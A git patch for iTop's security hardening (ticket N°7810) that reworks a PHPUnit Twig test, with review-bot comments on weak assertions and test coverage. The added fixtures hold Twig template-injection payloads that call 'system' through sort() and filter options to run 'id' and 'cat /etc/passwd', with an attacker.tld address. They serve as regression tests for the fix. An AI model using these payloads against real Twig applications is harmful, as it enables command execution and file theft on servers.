From 37fc1a572380f2faa67fddea5b1a3a4ba72ed54e Mon Sep 17 00:00:00 2001
From: Eric Espie
Date: Thu, 19 Dec 2024 15:12:26 +0100
Subject: [PATCH] =?UTF-8?q?N=C2=B07810=20-=20security=20hardening?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 tests/php-unit-tests/phpunit.xml.dist | 4 +-
 .../application/TwigBase/Twig/TwigTest.php | 80 ++++++++-----------
 .../application/TwigBase/Twig/test.html | 3 +
 .../application/TwigBase/Twig/test.html.twig | 3 +
 4 files changed, 42 insertions(+), 48 deletions(-)
diff --git a/tests/php-unit-tests/phpunit.xml.dist b/tests/php-unit-tests/phpunit.xml.dist
index fed259d40..94bfcbf08 100644
--- a/tests/php-unit-tests/phpunit.xml.dist
+++ b/tests/php-unit-tests/phpunit.xml.dist
@@ -41,7 +41,9 @@ unitary-tests/setup - + + unitary-tests/sources/application/TwigBase + unitary-tests/sources/application/search
diff --git a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/TwigTest.php b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/TwigTest.php
index c01ad8606..83df359d2 100644
--- a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/TwigTest.php
+++ b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/TwigTest.php
@@ -1,58 +1,44 @@ RequireOnceItopFile('core/config.class.inc.php');
- }
+ protected function setUp(): void
+ {
+ parent::setUp();
+ $this->RequireOnceItopFile('core/config.class.inc.php');
+ }
- /**
- * Test the fix for ticket N°4384
- *
- * @dataProvider TemplateProvider
- *
- */
- public function testTemplate($sFileName, $sExpected)
- {
- $sId = 'TestTwig';
- $oAppExtension = new AppExtension();
+ /**
+ * @covers N°4384 N°7810
+ *
+ */
+ public function testTemplate()
+ {
+ // Creating sandbox twig env. to load and test the custom form template
+ $oTwig = new Environment(new FilesystemLoader(__DIR__.'/'));
- // Creating sandbox twig env. to load and test the custom form template
- $oTwig = new Twig_Environment(new Twig_Loader_Array([$sId => $sFileName]));
+ // Manually registering filters and functions as we didn't find how to do it automatically
+ $oAppExtension = new AppExtension();
+ $aFilters = $oAppExtension->getFilters();
+ foreach ($aFilters as $oFilter)
+ {
+ $oTwig->addFilter($oFilter);
+ }
+ $aFunctions = $oAppExtension->getFunctions();
+ foreach ($aFunctions as $oFunction)
+ {
+ $oTwig->addFunction($oFunction);
+ }
- // Manually registering filters and functions as we didn't find how to do it automatically
- $aFilters = $oAppExtension->getFilters();
- foreach ($aFilters as $oFilter)
- {
- $oTwig->addFilter($oFilter);
- }
- $aFunctions = $oAppExtension->getFunctions();
- foreach ($aFunctions as $oFunction)
- {
- $oTwig->addFunction($oFunction);
- }
- }
+ $sOutput = $oTwig->render('test.html.twig');
- public static function testTemplateProvider()
- {
- $aReturn = array();
- $aReturn['filter_system'] = [
- 'sFileName' => 'test.html',
- 'expected' =>file_get_contents(dirname(__FILE__).'/test.html'),
- ];
-
- return $aReturn;
- }
+ $this->assertEquals(file_get_contents(__DIR__.'/test.html'), $sOutput);
+ }
 }
\ No newline at end of file
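Review bot: `$this->assertEquals(file_get_contents(__DIR__.'/test.html'), $sOutput);` at the end of testTemplate can pass when the fixture file is missing or unreadable and the render is empty, because `file_get_contents` returns `false` on failure and PHPUnit's scalar comparator falls back to `==` when one side is a bool (`false == ''` holds); `$this->assertSame(file_get_contents(__DIR__.'/test.html'), $sOutput);` fails on the type mismatch instead of masking the regression check. Nothing in the hunk registers an `app` global on the sandbox `Environment` (only AppExtension filters and functions are added), so the fixture line that reads `app.request.query` most likely renders as an empty string with or without the N°7810 change; unless AppExtension or code outside the hunk provides `app`, that case does not exercise the hardened path and needs `$oTwig->addGlobal('app', ...)` with a stub request, or a dedicated unit test against the filtering code, to be a real regression test. `@covers N°4384 N°7810` names tickets rather than classes or methods, which PHPUnit reports as an invalid covers target when coverage is collected; a plain `Related tickets: N°4384, N°7810` line in the docblock keeps the reference. The head of the hunk (use statements and the class declaration) is not readable in this view, so the imports of `Environment` and `FilesystemLoader` are assumed.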
diff --git a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html
index 15039796e..105c5a974 100644
--- a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html
+++ b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html
@@ -42,5 +42,8 @@ Smith, Dupond
['echo',1]|sort('system')|join
echo1 +
[['id','']|sort('system')
+id + POST /subscribe?0=cat+/etc/passwd HTTP/1.1 email=""@attacker.tld
\ No newline at end of file
diff --git a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html.twig b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html.twig
index 1232f8104..1b7eb63b9 100644
--- a/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html.twig
+++ b/tests/php-unit-tests/unitary-tests/sources/application/TwigBase/Twig/test.html.twig
@@ -47,5 +47,8 @@
['echo',1]|sort('system')|join
{{ ['echo',1]|sort('system')|join }} +
[['id','']|sort('system')
+{{['id','']|sort('system')|join}} + POST /subscribe?0=cat+/etc/passwd HTTP/1.1 email="{{ app.request.query.filter(0,0,1024,{'options':'system'}) }}"@attacker.tld
\ No newline at end of file
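Review bot: The new fixture lines carry no comment saying which rendered result proves the hardening, so a later reader cannot tell whether `id` and an empty `email=""` in test.html are the intended outputs or an artefact of the sandbox environment; a Twig comment placed before the added lines, such as `{#- N°7810: a string passed as the sort() comparator or as a filter option must not be treated as a callable; expected output is the plain join result and an empty query value -#}`, renders to nothing (the `-` markers keep the surrounding newline out of the output) and leaves test.html unchanged. The `app.request.query` case also depends on an `app` global being present in the test environment, which the template itself cannot guarantee, so the comment should say where that global is expected to come from.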